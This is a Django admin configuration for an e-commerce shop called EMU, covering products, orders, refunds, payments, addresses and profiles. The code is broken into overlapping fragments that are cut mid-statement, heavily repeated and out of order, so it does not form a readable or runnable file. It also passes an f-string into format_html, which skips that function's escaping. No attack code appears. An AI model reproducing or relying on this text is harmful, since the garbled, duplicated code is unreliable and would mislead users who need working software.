['being_delivered', 'cancelled', 'received']}), ('Refund', {'fields': ['refund_requested', 'refund_granted']}), ] @admin.register(CartProduct) class CartProductAdmin(admin.ModelAdmin):", "] @admin.register(CartProduct) class CartProductAdmin(admin.ModelAdmin): list_display = ['user', 'product', 'quantity', 'ordered'] readonly_fields = ['user',", "class CouponAdmin(admin.ModelAdmin): pass def refund_accepted(modeladmin, request, queryset): queryset.update(accepted=True) refund_accepted.short_description = 'Update refund to", "model = ProductImages @admin.register(Product) class ProductAdmin(admin.ModelAdmin): list_display = ['name', 'product_image', 'price', 'discount_price', 'slug',", "] readonly_fields = ['user', 'country', 'phone_number', 'image'] @admin.register(Contact) class ContactAdmin(admin.ModelAdmin): pass @admin.register(Size) class", "'ordered', 'ordered_date', 'being_delivered', 'cancelled', 'received', 'refund_requested', 'refund_granted', 'billing_address', 'shipping_address', 'payment', 'coupon', 'ip'] list_filter", "''') def make_refund_accepted(modeladmin, request, queryset): queryset.update(cancelled=True, refund_requested=False, refund_granted=True) make_refund_accepted.short_description = 'Update orders to", "'date_req'] readonly_fields = ['order', 'ref_code', 'accepted', 'email', 'reason'] actions = [refund_accepted] date_hierarchy =", "['user', 'product', 'quantity', 'ordered'] readonly_fields = ['user', 'product', 'quantity', 'ordered'] list_per_page = 5", "'country', 'phone_number', 'image'] @admin.register(Contact) class ContactAdmin(admin.ModelAdmin): pass @admin.register(Size) class SizeAdmin(admin.ModelAdmin): pass admin.site.site_title =", "list_display = ['name', 'product_image', 'price', 'discount_price', 'slug', 'label'] inlines = [ProductImageModel] list_per_page =", "['user', 'country', 'phone_number', 'image'] @admin.register(Contact) class ContactAdmin(admin.ModelAdmin): pass @admin.register(Size) class 
SizeAdmin(admin.ModelAdmin): pass admin.site.site_title", "@admin.register(Payment) class PaymentAdmin(admin.ModelAdmin): readonly_fields = ['stripe_charge_id', 'paypal_order_key', 'paypal_user_id', 'user', 'paypal_full_name', 'paypal_email', 'paypal_address1', 'paypal_address2',", "ProductImages, Profile, \\ Contact, Category, Size # admin.site.unregister(Group) class ProductImageModel(admin.StackedInline): model = ProductImages", "@admin.register(Refund) class RefundAdmin(admin.ModelAdmin): list_display = ['order', 'ref_code', 'accepted', 'email', 'date_req'] readonly_fields = ['order',", "'town', 'country', 'zip', 'address_type', 'default'] list_filter = ['default', 'address_type', 'country'] search_fields = ['user',", "Items', {'fields': ['products']}), ('Delivery Status', {'fields': ['being_delivered', 'cancelled', 'received']}), ('Refund', {'fields': ['refund_requested', 'refund_granted']}),", "= 5 date_hierarchy = 'timestamp' fieldsets = ( ('Customer', {'fields': ['user']}), ('Stripe Payment',", "= ['user', 'product', 'quantity', 'ordered'] readonly_fields = ['user', 'product', 'quantity', 'ordered'] list_per_page =", "[make_refund_accepted, make_product_received] readonly_fields = ['user', 'ordered', 'billing_address', 'shipping_address', 'payment', 'coupon', 'ref_code', 'products', 'ordered_date']", "admin from django.utils.html import format_html # from django.contrib.auth.models import Group from .models import", "'refund_requested', 'refund_granted'] list_display_links = ['user', 'billing_address', 'shipping_address', 'payment', 'coupon'] search_fields = ['user__username', 'ref_code']", "Photo', {'fields': ['image']}), ] readonly_fields = ['user', 'country', 'phone_number', 'image'] @admin.register(Contact) class ContactAdmin(admin.ModelAdmin):", "'discount_price', 'slug', 'label'] inlines = [ProductImageModel] list_per_page = 3 def product_image(self, obj): return", "'paypal_user_id', 'user', 'paypal_full_name', 'paypal_email', 'paypal_address1', 
'paypal_address2', 'paypal_postal_code', 'paypal_country_code', 'amount', 'paypal_amount'] list_display = ['user',", "'cancelled', 'received']}), ('Refund', {'fields': ['refund_requested', 'refund_granted']}), ] @admin.register(CartProduct) class CartProductAdmin(admin.ModelAdmin): list_display = ['user',", "make_refund_accepted(modeladmin, request, queryset): queryset.update(cancelled=True, refund_requested=False, refund_granted=True) make_refund_accepted.short_description = 'Update orders to refund granted'", "'ref_code', 'products', 'ordered_date'] date_hierarchy = 'ordered_date' fieldsets = [ ('Name', {'fields': ['user', 'ip',", "= ['user', 'street_address', 'apartment_address', 'zip'] date_hierarchy = 'date' @admin.register(Payment) class PaymentAdmin(admin.ModelAdmin): readonly_fields =", "'country', 'phone_number']}), ('Profile Photo', {'fields': ['image']}), ] readonly_fields = ['user', 'country', 'phone_number', 'image']", "= ( ('Customer', {'fields': ['user']}), ('Stripe Payment', {'fields': ['stripe_charge_id']}), ('Paypal Payment', {'fields': ['paypal_order_key',", "['paypal_order_key', 'paypal_user_id', 'paypal_full_name', 'paypal_email', 'paypal_address1', 'paypal_address2', 'paypal_postal_code', 'paypal_country_code', 'paypal_amount']}), ('Total Amount Paid', {'fields':", "Coupon, Refund, Setting, ProductImages, Profile, \\ Contact, Category, Size # admin.site.unregister(Group) class ProductImageModel(admin.StackedInline):", "pass def refund_accepted(modeladmin, request, queryset): queryset.update(accepted=True) refund_accepted.short_description = 'Update refund to accepted' @admin.register(Refund)", "'paypal_full_name', 'paypal_email', 'paypal_address1', 'paypal_address2', 'paypal_postal_code', 'paypal_country_code', 'paypal_amount']}), ('Total Amount Paid', {'fields': ['amount']}), )", "3 def product_image(self, obj): return format_html(f''' <img height='80px' src='{obj.image.url}'/> ''') def make_refund_accepted(modeladmin, request,", "Profile, \\ 
Contact, Category, Size # admin.site.unregister(Group) class ProductImageModel(admin.StackedInline): model = ProductImages @admin.register(Product)", "list_per_page = 3 def product_image(self, obj): return format_html(f''' <img height='80px' src='{obj.image.url}'/> ''') def", "'price', 'discount_price', 'slug', 'label'] inlines = [ProductImageModel] list_per_page = 3 def product_image(self, obj):", "django.utils.html import format_html # from django.contrib.auth.models import Group from .models import Product, CartProduct,", "class PaymentAdmin(admin.ModelAdmin): readonly_fields = ['stripe_charge_id', 'paypal_order_key', 'paypal_user_id', 'user', 'paypal_full_name', 'paypal_email', 'paypal_address1', 'paypal_address2', 'paypal_postal_code',", "obj): return format_html(f''' <img height='80px' src='{obj.image.url}'/> ''') def make_refund_accepted(modeladmin, request, queryset): queryset.update(cancelled=True, refund_requested=False,", "def refund_accepted(modeladmin, request, queryset): queryset.update(accepted=True) refund_accepted.short_description = 'Update refund to accepted' @admin.register(Refund) class", "= ['user', 'amount', 'timestamp'] list_per_page = 5 date_hierarchy = 'timestamp' fieldsets = (", "received' @admin.register(Category) class CategoryAdmin(admin.ModelAdmin): pass @admin.register(Order) class OrderAdmin(admin.ModelAdmin): list_display = ['user', 'ordered', 'ordered_date',", "= ProductImages @admin.register(Product) class ProductAdmin(admin.ModelAdmin): list_display = ['name', 'product_image', 'price', 'discount_price', 'slug', 'label']", "('Total Amount Paid', {'fields': ['amount']}), ) @admin.register(Coupon) class CouponAdmin(admin.ModelAdmin): pass def refund_accepted(modeladmin, request,", "Product, CartProduct, Order, Address, Payment, Coupon, Refund, Setting, ProductImages, Profile, \\ Contact, Category,", "= 'date_req' @admin.register(Setting) class SettingAdmin(admin.ModelAdmin): pass @admin.register(Profile) class 
ProfileAdmin(admin.ModelAdmin): fieldsets = [ ('User", "'coupon', 'ip'] list_filter = ['ordered', 'being_delivered', 'received', 'refund_requested', 'refund_granted'] list_display_links = ['user', 'billing_address',", "'zip', 'address_type', 'default'] list_filter = ['default', 'address_type', 'country'] search_fields = ['user', 'street_address', 'apartment_address',", "('Customer', {'fields': ['user']}), ('Stripe Payment', {'fields': ['stripe_charge_id']}), ('Paypal Payment', {'fields': ['paypal_order_key', 'paypal_user_id', 'paypal_full_name',", "Profile', {'fields': ['user', 'country', 'phone_number']}), ('Profile Photo', {'fields': ['image']}), ] readonly_fields = ['user',", "queryset): queryset.update(cancelled=True, refund_requested=False, refund_granted=True) make_refund_accepted.short_description = 'Update orders to refund granted' def make_product_received(modeladmin,", "make_refund_accepted.short_description = 'Update orders to refund granted' def make_product_received(modeladmin, request, queryset): queryset.update(received=True) make_product_received.short_description", "= [refund_accepted] date_hierarchy = 'date_req' @admin.register(Setting) class SettingAdmin(admin.ModelAdmin): pass @admin.register(Profile) class ProfileAdmin(admin.ModelAdmin): fieldsets", "fieldsets = ( ('Customer', {'fields': ['user']}), ('Stripe Payment', {'fields': ['stripe_charge_id']}), ('Paypal Payment', {'fields':", "class ProductImageModel(admin.StackedInline): model = ProductImages @admin.register(Product) class ProductAdmin(admin.ModelAdmin): list_display = ['name', 'product_image', 'price',", "'ref_code']}), ('Ordered Items', {'fields': ['products']}), ('Delivery Status', {'fields': ['being_delivered', 'cancelled', 'received']}), ('Refund', {'fields':", "'product_image', 'price', 'discount_price', 'slug', 'label'] inlines = [ProductImageModel] list_per_page = 3 def product_image(self,", "{'fields': ['refund_requested', 'refund_granted']}), ] @admin.register(CartProduct) 
class CartProductAdmin(admin.ModelAdmin): list_display = ['user', 'product', 'quantity', 'ordered']", "['stripe_charge_id', 'paypal_order_key', 'paypal_user_id', 'user', 'paypal_full_name', 'paypal_email', 'paypal_address1', 'paypal_address2', 'paypal_postal_code', 'paypal_country_code', 'amount', 'paypal_amount'] list_display", "Payment, Coupon, Refund, Setting, ProductImages, Profile, \\ Contact, Category, Size # admin.site.unregister(Group) class", "['refund_requested', 'refund_granted']}), ] @admin.register(CartProduct) class CartProductAdmin(admin.ModelAdmin): list_display = ['user', 'product', 'quantity', 'ordered'] readonly_fields", "['user', 'billing_address', 'shipping_address', 'payment', 'coupon'] search_fields = ['user__username', 'ref_code'] actions = [make_refund_accepted, make_product_received]", "'coupon'] search_fields = ['user__username', 'ref_code'] actions = [make_refund_accepted, make_product_received] readonly_fields = ['user', 'ordered',", "fieldsets = [ ('User Profile', {'fields': ['user', 'country', 'phone_number']}), ('Profile Photo', {'fields': ['image']}),", "'ordered_date' fieldsets = [ ('Name', {'fields': ['user', 'ip', 'billing_address', 'shipping_address']}), ('Order Information', {'fields':", "'ref_code', 'accepted', 'email', 'reason'] actions = [refund_accepted] date_hierarchy = 'date_req' @admin.register(Setting) class SettingAdmin(admin.ModelAdmin):", "'Update orders to received' @admin.register(Category) class CategoryAdmin(admin.ModelAdmin): pass @admin.register(Order) class OrderAdmin(admin.ModelAdmin): list_display =", "'paypal_email', 'paypal_address1', 'paypal_address2', 'paypal_postal_code', 'paypal_country_code', 'amount', 'paypal_amount'] list_display = ['user', 'amount', 'timestamp'] list_per_page", "request, queryset): queryset.update(accepted=True) refund_accepted.short_description = 'Update refund to accepted' @admin.register(Refund) class RefundAdmin(admin.ModelAdmin): list_display", "'quantity', 'ordered'] 
list_per_page = 5 @admin.register(Address) class AddressAdmin(admin.ModelAdmin): list_display = ['user', 'date', 'address',", "@admin.register(Category) class CategoryAdmin(admin.ModelAdmin): pass @admin.register(Order) class OrderAdmin(admin.ModelAdmin): list_display = ['user', 'ordered', 'ordered_date', 'being_delivered',", "readonly_fields = ['order', 'ref_code', 'accepted', 'email', 'reason'] actions = [refund_accepted] date_hierarchy = 'date_req'", "= 'Update refund to accepted' @admin.register(Refund) class RefundAdmin(admin.ModelAdmin): list_display = ['order', 'ref_code', 'accepted',", "date_hierarchy = 'timestamp' fieldsets = ( ('Customer', {'fields': ['user']}), ('Stripe Payment', {'fields': ['stripe_charge_id']}),", "ProfileAdmin(admin.ModelAdmin): fieldsets = [ ('User Profile', {'fields': ['user', 'country', 'phone_number']}), ('Profile Photo', {'fields':", "'default'] list_filter = ['default', 'address_type', 'country'] search_fields = ['user', 'street_address', 'apartment_address', 'zip'] date_hierarchy", "= 3 def product_image(self, obj): return format_html(f''' <img height='80px' src='{obj.image.url}'/> ''') def make_refund_accepted(modeladmin,", "class SettingAdmin(admin.ModelAdmin): pass @admin.register(Profile) class ProfileAdmin(admin.ModelAdmin): fieldsets = [ ('User Profile', {'fields': ['user',", "{'fields': ['amount']}), ) @admin.register(Coupon) class CouponAdmin(admin.ModelAdmin): pass def refund_accepted(modeladmin, request, queryset): queryset.update(accepted=True) refund_accepted.short_description", "'address', 'town', 'country', 'zip', 'address_type', 'default'] list_filter = ['default', 'address_type', 'country'] search_fields =", "product_image(self, obj): return format_html(f''' <img height='80px' src='{obj.image.url}'/> ''') def make_refund_accepted(modeladmin, request, queryset): queryset.update(cancelled=True,", "pass @admin.register(Order) class OrderAdmin(admin.ModelAdmin): list_display = ['user', 'ordered', 'ordered_date', 
'being_delivered', 'cancelled', 'received', 'refund_requested',", "readonly_fields = ['user', 'country', 'phone_number', 'image'] @admin.register(Contact) class ContactAdmin(admin.ModelAdmin): pass @admin.register(Size) class SizeAdmin(admin.ModelAdmin):", "'apartment_address', 'zip'] date_hierarchy = 'date' @admin.register(Payment) class PaymentAdmin(admin.ModelAdmin): readonly_fields = ['stripe_charge_id', 'paypal_order_key', 'paypal_user_id',", "[ProductImageModel] list_per_page = 3 def product_image(self, obj): return format_html(f''' <img height='80px' src='{obj.image.url}'/> ''')", "'ip', 'billing_address', 'shipping_address']}), ('Order Information', {'fields': ['ordered', 'ordered_date', 'payment', 'coupon', 'ref_code']}), ('Ordered Items',", "= 'timestamp' fieldsets = ( ('Customer', {'fields': ['user']}), ('Stripe Payment', {'fields': ['stripe_charge_id']}), ('Paypal", "request, queryset): queryset.update(cancelled=True, refund_requested=False, refund_granted=True) make_refund_accepted.short_description = 'Update orders to refund granted' def", "'shipping_address']}), ('Order Information', {'fields': ['ordered', 'ordered_date', 'payment', 'coupon', 'ref_code']}), ('Ordered Items', {'fields': ['products']}),", "= 5 @admin.register(Address) class AddressAdmin(admin.ModelAdmin): list_display = ['user', 'date', 'address', 'town', 'country', 'zip',", "'accepted', 'email', 'reason'] actions = [refund_accepted] date_hierarchy = 'date_req' @admin.register(Setting) class SettingAdmin(admin.ModelAdmin): pass", "[ ('User Profile', {'fields': ['user', 'country', 'phone_number']}), ('Profile Photo', {'fields': ['image']}), ] readonly_fields", "'date' @admin.register(Payment) class PaymentAdmin(admin.ModelAdmin): readonly_fields = ['stripe_charge_id', 'paypal_order_key', 'paypal_user_id', 'user', 'paypal_full_name', 'paypal_email', 'paypal_address1',", "list_display = ['user', 'product', 'quantity', 'ordered'] readonly_fields = ['user', 'product', 'quantity', 'ordered'] 
list_per_page", "PaymentAdmin(admin.ModelAdmin): readonly_fields = ['stripe_charge_id', 'paypal_order_key', 'paypal_user_id', 'user', 'paypal_full_name', 'paypal_email', 'paypal_address1', 'paypal_address2', 'paypal_postal_code', 'paypal_country_code',", "('Profile Photo', {'fields': ['image']}), ] readonly_fields = ['user', 'country', 'phone_number', 'image'] @admin.register(Contact) class", "['default', 'address_type', 'country'] search_fields = ['user', 'street_address', 'apartment_address', 'zip'] date_hierarchy = 'date' @admin.register(Payment)", "'shipping_address', 'payment', 'coupon', 'ref_code', 'products', 'ordered_date'] date_hierarchy = 'ordered_date' fieldsets = [ ('Name',", "admin.site.unregister(Group) class ProductImageModel(admin.StackedInline): model = ProductImages @admin.register(Product) class ProductAdmin(admin.ModelAdmin): list_display = ['name', 'product_image',", "'user', 'paypal_full_name', 'paypal_email', 'paypal_address1', 'paypal_address2', 'paypal_postal_code', 'paypal_country_code', 'amount', 'paypal_amount'] list_display = ['user', 'amount',", "from django.utils.html import format_html # from django.contrib.auth.models import Group from .models import Product,", "'zip'] date_hierarchy = 'date' @admin.register(Payment) class PaymentAdmin(admin.ModelAdmin): readonly_fields = ['stripe_charge_id', 'paypal_order_key', 'paypal_user_id', 'user',", "ContactAdmin(admin.ModelAdmin): pass @admin.register(Size) class SizeAdmin(admin.ModelAdmin): pass admin.site.site_title = \"EMU\" admin.site.site_header = \"EMU\" admin.site.index_title", "refund_accepted(modeladmin, request, queryset): queryset.update(accepted=True) refund_accepted.short_description = 'Update refund to accepted' @admin.register(Refund) class RefundAdmin(admin.ModelAdmin):", "Setting, ProductImages, Profile, \\ Contact, Category, Size # admin.site.unregister(Group) class ProductImageModel(admin.StackedInline): model =", "= [make_refund_accepted, make_product_received] 
readonly_fields = ['user', 'ordered', 'billing_address', 'shipping_address', 'payment', 'coupon', 'ref_code', 'products',", "'ordered_date', 'payment', 'coupon', 'ref_code']}), ('Ordered Items', {'fields': ['products']}), ('Delivery Status', {'fields': ['being_delivered', 'cancelled',", "{'fields': ['user']}), ('Stripe Payment', {'fields': ['stripe_charge_id']}), ('Paypal Payment', {'fields': ['paypal_order_key', 'paypal_user_id', 'paypal_full_name', 'paypal_email',", "Group from .models import Product, CartProduct, Order, Address, Payment, Coupon, Refund, Setting, ProductImages,", "'shipping_address', 'payment', 'coupon', 'ip'] list_filter = ['ordered', 'being_delivered', 'received', 'refund_requested', 'refund_granted'] list_display_links =", "@admin.register(Size) class SizeAdmin(admin.ModelAdmin): pass admin.site.site_title = \"EMU\" admin.site.site_header = \"EMU\" admin.site.index_title = \"Administration\"", "'timestamp' fieldsets = ( ('Customer', {'fields': ['user']}), ('Stripe Payment', {'fields': ['stripe_charge_id']}), ('Paypal Payment',", "= ['user', 'billing_address', 'shipping_address', 'payment', 'coupon'] search_fields = ['user__username', 'ref_code'] actions = [make_refund_accepted,", "'refund_granted', 'billing_address', 'shipping_address', 'payment', 'coupon', 'ip'] list_filter = ['ordered', 'being_delivered', 'received', 'refund_requested', 'refund_granted']", "Category, Size # admin.site.unregister(Group) class ProductImageModel(admin.StackedInline): model = ProductImages @admin.register(Product) class ProductAdmin(admin.ModelAdmin): list_display", "format_html # from django.contrib.auth.models import Group from .models import Product, CartProduct, Order, Address,", "{'fields': ['user', 'ip', 'billing_address', 'shipping_address']}), ('Order Information', {'fields': ['ordered', 'ordered_date', 'payment', 'coupon', 'ref_code']}),", "'email', 'reason'] actions = [refund_accepted] date_hierarchy = 'date_req' @admin.register(Setting) class 
SettingAdmin(admin.ModelAdmin): pass @admin.register(Profile)", "make_product_received] readonly_fields = ['user', 'ordered', 'billing_address', 'shipping_address', 'payment', 'coupon', 'ref_code', 'products', 'ordered_date'] date_hierarchy", "['ordered', 'being_delivered', 'received', 'refund_requested', 'refund_granted'] list_display_links = ['user', 'billing_address', 'shipping_address', 'payment', 'coupon'] search_fields", "make_product_received(modeladmin, request, queryset): queryset.update(received=True) make_product_received.short_description = 'Update orders to received' @admin.register(Category) class CategoryAdmin(admin.ModelAdmin):", "= ['order', 'ref_code', 'accepted', 'email', 'reason'] actions = [refund_accepted] date_hierarchy = 'date_req' @admin.register(Setting)", "def product_image(self, obj): return format_html(f''' <img height='80px' src='{obj.image.url}'/> ''') def make_refund_accepted(modeladmin, request, queryset):", "'paypal_email', 'paypal_address1', 'paypal_address2', 'paypal_postal_code', 'paypal_country_code', 'paypal_amount']}), ('Total Amount Paid', {'fields': ['amount']}), ) @admin.register(Coupon)", "src='{obj.image.url}'/> ''') def make_refund_accepted(modeladmin, request, queryset): queryset.update(cancelled=True, refund_requested=False, refund_granted=True) make_refund_accepted.short_description = 'Update orders", "= [ ('User Profile', {'fields': ['user', 'country', 'phone_number']}), ('Profile Photo', {'fields': ['image']}), ]", "('Refund', {'fields': ['refund_requested', 'refund_granted']}), ] @admin.register(CartProduct) class CartProductAdmin(admin.ModelAdmin): list_display = ['user', 'product', 'quantity',", "accepted' @admin.register(Refund) class RefundAdmin(admin.ModelAdmin): list_display = ['order', 'ref_code', 'accepted', 'email', 'date_req'] readonly_fields =", "@admin.register(Profile) class ProfileAdmin(admin.ModelAdmin): fieldsets = [ ('User Profile', {'fields': ['user', 'country', 'phone_number']}), ('Profile", 
"'address_type', 'country'] search_fields = ['user', 'street_address', 'apartment_address', 'zip'] date_hierarchy = 'date' @admin.register(Payment) class", "<img height='80px' src='{obj.image.url}'/> ''') def make_refund_accepted(modeladmin, request, queryset): queryset.update(cancelled=True, refund_requested=False, refund_granted=True) make_refund_accepted.short_description =", "import admin from django.utils.html import format_html # from django.contrib.auth.models import Group from .models", "'payment', 'coupon', 'ip'] list_filter = ['ordered', 'being_delivered', 'received', 'refund_requested', 'refund_granted'] list_display_links = ['user',", "refund granted' def make_product_received(modeladmin, request, queryset): queryset.update(received=True) make_product_received.short_description = 'Update orders to received'", "'reason'] actions = [refund_accepted] date_hierarchy = 'date_req' @admin.register(Setting) class SettingAdmin(admin.ModelAdmin): pass @admin.register(Profile) class", "list_display = ['user', 'amount', 'timestamp'] list_per_page = 5 date_hierarchy = 'timestamp' fieldsets =", "'paypal_address1', 'paypal_address2', 'paypal_postal_code', 'paypal_country_code', 'paypal_amount']}), ('Total Amount Paid', {'fields': ['amount']}), ) @admin.register(Coupon) class", "RefundAdmin(admin.ModelAdmin): list_display = ['order', 'ref_code', 'accepted', 'email', 'date_req'] readonly_fields = ['order', 'ref_code', 'accepted',", "'paypal_country_code', 'amount', 'paypal_amount'] list_display = ['user', 'amount', 'timestamp'] list_per_page = 5 date_hierarchy =", "[refund_accepted] date_hierarchy = 'date_req' @admin.register(Setting) class SettingAdmin(admin.ModelAdmin): pass @admin.register(Profile) class ProfileAdmin(admin.ModelAdmin): fieldsets =", "'coupon', 'ref_code']}), ('Ordered Items', {'fields': ['products']}), ('Delivery Status', {'fields': ['being_delivered', 'cancelled', 'received']}), ('Refund',", "= ['user', 'ordered', 'ordered_date', 'being_delivered', 
'cancelled', 'received', 'refund_requested', 'refund_granted', 'billing_address', 'shipping_address', 'payment', 'coupon',", "'Update orders to refund granted' def make_product_received(modeladmin, request, queryset): queryset.update(received=True) make_product_received.short_description = 'Update", "from django.contrib.auth.models import Group from .models import Product, CartProduct, Order, Address, Payment, Coupon,", "{'fields': ['paypal_order_key', 'paypal_user_id', 'paypal_full_name', 'paypal_email', 'paypal_address1', 'paypal_address2', 'paypal_postal_code', 'paypal_country_code', 'paypal_amount']}), ('Total Amount Paid',", "'refund_granted'] list_display_links = ['user', 'billing_address', 'shipping_address', 'payment', 'coupon'] search_fields = ['user__username', 'ref_code'] actions", "['ordered', 'ordered_date', 'payment', 'coupon', 'ref_code']}), ('Ordered Items', {'fields': ['products']}), ('Delivery Status', {'fields': ['being_delivered',", "['order', 'ref_code', 'accepted', 'email', 'date_req'] readonly_fields = ['order', 'ref_code', 'accepted', 'email', 'reason'] actions", "'date', 'address', 'town', 'country', 'zip', 'address_type', 'default'] list_filter = ['default', 'address_type', 'country'] search_fields", "class ProfileAdmin(admin.ModelAdmin): fieldsets = [ ('User Profile', {'fields': ['user', 'country', 'phone_number']}), ('Profile Photo',", "'being_delivered', 'cancelled', 'received', 'refund_requested', 'refund_granted', 'billing_address', 'shipping_address', 'payment', 'coupon', 'ip'] list_filter = ['ordered',", "['user', 'date', 'address', 'town', 'country', 'zip', 'address_type', 'default'] list_filter = ['default', 'address_type', 'country']", "'paypal_address1', 'paypal_address2', 'paypal_postal_code', 'paypal_country_code', 'amount', 'paypal_amount'] list_display = ['user', 'amount', 'timestamp'] list_per_page =", "refund_accepted.short_description = 'Update refund to accepted' @admin.register(Refund) class 
RefundAdmin(admin.ModelAdmin): list_display = ['order', 'ref_code',", "'refund_requested', 'refund_granted', 'billing_address', 'shipping_address', 'payment', 'coupon', 'ip'] list_filter = ['ordered', 'being_delivered', 'received', 'refund_requested',", "{'fields': ['products']}), ('Delivery Status', {'fields': ['being_delivered', 'cancelled', 'received']}), ('Refund', {'fields': ['refund_requested', 'refund_granted']}), ]", "= ['user', 'country', 'phone_number', 'image'] @admin.register(Contact) class ContactAdmin(admin.ModelAdmin): pass @admin.register(Size) class SizeAdmin(admin.ModelAdmin): pass", "list_per_page = 5 @admin.register(Address) class AddressAdmin(admin.ModelAdmin): list_display = ['user', 'date', 'address', 'town', 'country',", "class ProductAdmin(admin.ModelAdmin): list_display = ['name', 'product_image', 'price', 'discount_price', 'slug', 'label'] inlines = [ProductImageModel]", "'ordered'] readonly_fields = ['user', 'product', 'quantity', 'ordered'] list_per_page = 5 @admin.register(Address) class AddressAdmin(admin.ModelAdmin):", "@admin.register(Address) class AddressAdmin(admin.ModelAdmin): list_display = ['user', 'date', 'address', 'town', 'country', 'zip', 'address_type', 'default']", "['user']}), ('Stripe Payment', {'fields': ['stripe_charge_id']}), ('Paypal Payment', {'fields': ['paypal_order_key', 'paypal_user_id', 'paypal_full_name', 'paypal_email', 'paypal_address1',", "'paypal_country_code', 'paypal_amount']}), ('Total Amount Paid', {'fields': ['amount']}), ) @admin.register(Coupon) class CouponAdmin(admin.ModelAdmin): pass def", "[ ('Name', {'fields': ['user', 'ip', 'billing_address', 'shipping_address']}), ('Order Information', {'fields': ['ordered', 'ordered_date', 'payment',", "('Name', {'fields': ['user', 'ip', 'billing_address', 'shipping_address']}), ('Order Information', {'fields': ['ordered', 'ordered_date', 'payment', 'coupon',", "{'fields': ['ordered', 'ordered_date', 'payment', 'coupon', 'ref_code']}), ('Ordered Items', 
{'fields': ['products']}), ('Delivery Status', {'fields':", "def make_product_received(modeladmin, request, queryset): queryset.update(received=True) make_product_received.short_description = 'Update orders to received' @admin.register(Category) class", "['order', 'ref_code', 'accepted', 'email', 'reason'] actions = [refund_accepted] date_hierarchy = 'date_req' @admin.register(Setting) class", "'timestamp'] list_per_page = 5 date_hierarchy = 'timestamp' fieldsets = ( ('Customer', {'fields': ['user']}),", "def make_refund_accepted(modeladmin, request, queryset): queryset.update(cancelled=True, refund_requested=False, refund_granted=True) make_refund_accepted.short_description = 'Update orders to refund", "'address_type', 'default'] list_filter = ['default', 'address_type', 'country'] search_fields = ['user', 'street_address', 'apartment_address', 'zip']", "'date_req' @admin.register(Setting) class SettingAdmin(admin.ModelAdmin): pass @admin.register(Profile) class ProfileAdmin(admin.ModelAdmin): fieldsets = [ ('User Profile',", "pass @admin.register(Size) class SizeAdmin(admin.ModelAdmin): pass admin.site.site_title = \"EMU\" admin.site.site_header = \"EMU\" admin.site.index_title =", "= ['user', 'date', 'address', 'town', 'country', 'zip', 'address_type', 'default'] list_filter = ['default', 'address_type',", "import format_html # from django.contrib.auth.models import Group from .models import Product, CartProduct, Order,", "queryset.update(received=True) make_product_received.short_description = 'Update orders to received' @admin.register(Category) class CategoryAdmin(admin.ModelAdmin): pass @admin.register(Order) class", "@admin.register(CartProduct) class CartProductAdmin(admin.ModelAdmin): list_display = ['user', 'product', 'quantity', 'ordered'] readonly_fields = ['user', 'product',", "'paypal_user_id', 'paypal_full_name', 'paypal_email', 'paypal_address1', 'paypal_address2', 'paypal_postal_code', 'paypal_country_code', 'paypal_amount']}), ('Total Amount 
Paid', {'fields': ['amount']}),", "= 'ordered_date' fieldsets = [ ('Name', {'fields': ['user', 'ip', 'billing_address', 'shipping_address']}), ('Order Information',", "Payment', {'fields': ['stripe_charge_id']}), ('Paypal Payment', {'fields': ['paypal_order_key', 'paypal_user_id', 'paypal_full_name', 'paypal_email', 'paypal_address1', 'paypal_address2', 'paypal_postal_code',", "['user', 'ordered', 'ordered_date', 'being_delivered', 'cancelled', 'received', 'refund_requested', 'refund_granted', 'billing_address', 'shipping_address', 'payment', 'coupon', 'ip']", "queryset): queryset.update(accepted=True) refund_accepted.short_description = 'Update refund to accepted' @admin.register(Refund) class RefundAdmin(admin.ModelAdmin): list_display =", "( ('Customer', {'fields': ['user']}), ('Stripe Payment', {'fields': ['stripe_charge_id']}), ('Paypal Payment', {'fields': ['paypal_order_key', 'paypal_user_id',", "'being_delivered', 'received', 'refund_requested', 'refund_granted'] list_display_links = ['user', 'billing_address', 'shipping_address', 'payment', 'coupon'] search_fields =", "'billing_address', 'shipping_address']}), ('Order Information', {'fields': ['ordered', 'ordered_date', 'payment', 'coupon', 'ref_code']}), ('Ordered Items', {'fields':", "'payment', 'coupon', 'ref_code', 'products', 'ordered_date'] date_hierarchy = 'ordered_date' fieldsets = [ ('Name', {'fields':", "'paypal_postal_code', 'paypal_country_code', 'amount', 'paypal_amount'] list_display = ['user', 'amount', 'timestamp'] list_per_page = 5 date_hierarchy", "'received', 'refund_requested', 'refund_granted'] list_display_links = ['user', 'billing_address', 'shipping_address', 'payment', 'coupon'] search_fields = ['user__username',", "'received']}), ('Refund', {'fields': ['refund_requested', 'refund_granted']}), ] @admin.register(CartProduct) class CartProductAdmin(admin.ModelAdmin): list_display = ['user', 'product',", "date_hierarchy = 'ordered_date' fieldsets = [ ('Name', {'fields': ['user', 'ip', 
'billing_address', 'shipping_address']}), ('Order", "['user', 'product', 'quantity', 'ordered'] list_per_page = 5 @admin.register(Address) class AddressAdmin(admin.ModelAdmin): list_display = ['user',", "inlines = [ProductImageModel] list_per_page = 3 def product_image(self, obj): return format_html(f''' <img height='80px'", "'product', 'quantity', 'ordered'] readonly_fields = ['user', 'product', 'quantity', 'ordered'] list_per_page = 5 @admin.register(Address)", "'country', 'zip', 'address_type', 'default'] list_filter = ['default', 'address_type', 'country'] search_fields = ['user', 'street_address',", "5 date_hierarchy = 'timestamp' fieldsets = ( ('Customer', {'fields': ['user']}), ('Stripe Payment', {'fields':", "SettingAdmin(admin.ModelAdmin): pass @admin.register(Profile) class ProfileAdmin(admin.ModelAdmin): fieldsets = [ ('User Profile', {'fields': ['user', 'country',", "['user', 'country', 'phone_number']}), ('Profile Photo', {'fields': ['image']}), ] readonly_fields = ['user', 'country', 'phone_number',", "['user', 'street_address', 'apartment_address', 'zip'] date_hierarchy = 'date' @admin.register(Payment) class PaymentAdmin(admin.ModelAdmin): readonly_fields = ['stripe_charge_id',", "'amount', 'paypal_amount'] list_display = ['user', 'amount', 'timestamp'] list_per_page = 5 date_hierarchy = 'timestamp'", "= [ProductImageModel] list_per_page = 3 def product_image(self, obj): return format_html(f''' <img height='80px' src='{obj.image.url}'/>", "'amount', 'timestamp'] list_per_page = 5 date_hierarchy = 'timestamp' fieldsets = ( ('Customer', {'fields':", "'ordered'] list_per_page = 5 @admin.register(Address) class AddressAdmin(admin.ModelAdmin): list_display = ['user', 'date', 'address', 'town',", "height='80px' src='{obj.image.url}'/> ''') def make_refund_accepted(modeladmin, request, queryset): queryset.update(cancelled=True, refund_requested=False, refund_granted=True) make_refund_accepted.short_description = 'Update", "['user__username', 'ref_code'] 
